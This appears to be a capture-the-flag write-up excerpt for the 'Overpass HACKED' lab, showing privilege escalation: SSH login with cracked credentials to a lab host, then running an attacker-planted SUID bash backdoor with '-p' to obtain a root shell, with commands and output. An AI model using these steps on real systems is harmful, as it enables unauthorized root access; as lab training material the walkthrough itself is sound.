Skip to main content

Overpass HACKED

Privilege Escalation

We can Log-In using SSH with the Cracked Password. The Attacker left a way to get ROOT Access without a Password: suid_bash


  • Using SSH Credentials to Login: james:november16
  • ssh -oHostKeyAlgorithms=+ssh-rsa james@10.10.49.160 -p 2222
james@overpass-production:/home/james$ id
uid=1000(james) gid=1000(james) groups=1000(james),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)

  • The Attacked left an easy access to Gain ROOT Privileges.
  • /home/james/.suid_bash
james@overpass-production:/home/james/ssh-backdoor$ cd ..
james@overpass-production:/home/james$ ls -al
...
-rwsr-sr-x 1 root  root  1113504 Jul 22  2020 .suid_bash
...
james@overpass-production:/home/james$ mv .suid_bash suid_bash
james@overpass-production:/home/james$ ./suid_bash -p
root@overpass-production:/home/james$ id
uid=1000(james) gid=1000(james) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd),1000(james)
root@overpass-production:/home/james$ whoami
root